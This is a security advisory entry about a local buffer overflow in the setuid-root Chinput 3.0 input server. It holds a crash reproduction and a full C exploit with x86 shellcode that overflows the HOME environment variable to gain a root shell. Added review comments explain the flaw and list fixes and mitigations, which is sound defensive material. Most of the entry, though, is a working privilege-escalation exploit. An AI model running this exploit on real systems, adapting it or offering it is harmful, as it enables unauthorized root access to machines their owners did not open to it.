COMMAND

Chinput local buffer overflow leads gives root

SYSTEMS AFFECTED

??

PROBLEM

Xperc posted :

Chinput is a Chinese input server on UNIX/Linux. It supports XIM(X Input Method) Protocl and its own protocl for Chinese platform.

$ls -l /usr/bin/chinput
-rwsr-xr-x 1 root root 317272 Jan 15 21:31 /usr/bin/chinput
$export HOME=`perl -e 'print "a"x800'`
$/usr/bin/chinput
Segmentation fault

/* local exploit for Chinput 3.0
 * .. tested in TurboLinux 6.5 with kernel 2.2.18
 *
 * Usage: $gcc chinput_exp.c
 *        $./a.out
 *        bash-2.04$ /usr/bin/chinput
 *
 * by xperc@hotmail.com
 * 2002/1/16
 */

/*
 * Review notes (defensive reading of this proof of concept):
 *
 * The advisory above shows /usr/bin/chinput installed setuid root and
 * crashing as soon as HOME holds an 800-byte string, which indicates that
 * the program copies an attacker-controlled environment variable into a
 * fixed-size stack buffer with no length check. This file demonstrates the
 * impact: it builds an oversized HOME value, exports it, and starts a shell
 * so the vulnerable binary can be run from that environment. The constants
 * (260-byte padding, OFS) are specific to the build and platform named in
 * the header comment.
 *
 * Fix on the Chinput side: bound every copy of environment data (snprintf
 * or an explicit length check before copying), reject oversized values, and
 * do not trust HOME at all in a setuid program (or drop the setuid bit
 * entirely). Stack canaries, non-executable stacks and ASLR, standard on
 * current Linux, also defeat this technique; a setuid root binary crashing
 * on a long environment variable is itself a detection signal worth logging.
 */

#include <stdio.h>
#include <stdlib.h>

/* x86 NOP (0x90): fills the part of the HOME value that precedes the payload. */
#define NOP 0x90
/* Distance subtracted from this process's stack pointer to guess the
 * target's; only meaningful for the build named above. */
#define OFS 0x1f0

/* Returns this process's stack pointer via GCC inline asm (32-bit x86
 * only). There is no return statement; the value is left in %eax and the
 * caller relies on that being the return register. */
unsigned long get_esp()
{
    __asm__("mov %esp,%eax");
}

/* Machine-code payload: the first two 8-byte groups are annotated by the
 * author as setuid(0)/setgid(0) system calls; the string ends with "/bin/sh".
 * main() advances this pointer while copying, so it is consumed once. */
char *shellcode =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid=0 */
    "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" /* setgid=0 */
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b"
    "\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56"
    "\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
    "\xff\xff\xff/bin/sh";

/* Buffer holding the "HOME=..." string handed to putenv(); s1 is the write
 * cursor into it. putenv() keeps a pointer to s, so it must stay alive for
 * the life of the process, which a file-scope array guarantees. */
char s[512];
char *s1;

/* Builds HOME = "HOME=" + NOP padding + payload + guessed return address,
 * exports it with putenv(), and spawns bash with that environment. Prints
 * the address it wrote. Returns nothing explicitly (no return statement). */
int main()
{
    strcpy(s, "HOME=");
    s1 = s + 5;
    /* Pad so that padding + payload together occupy 260 bytes after "HOME=". */
    while (s1 < s + 260 + 5 - strlen(shellcode))
        *(s1++) = NOP;
    /* Copy the payload, advancing the global pointer as it goes. */
    while (*shellcode)
        *(s1++) = *(shellcode++);
    /* Append the 4-byte address the overflowed return slot is expected to take. */
    *((unsigned long *)s1) = get_esp() - OFS;
    printf("Jump to: %p\n", *((long *)s1));
    s1 += 4;
    *s1 = 0;
    putenv(s);
    /* The child shell inherits the crafted HOME; the user then runs chinput from it. */
    system("bash");
}

SOLUTION

??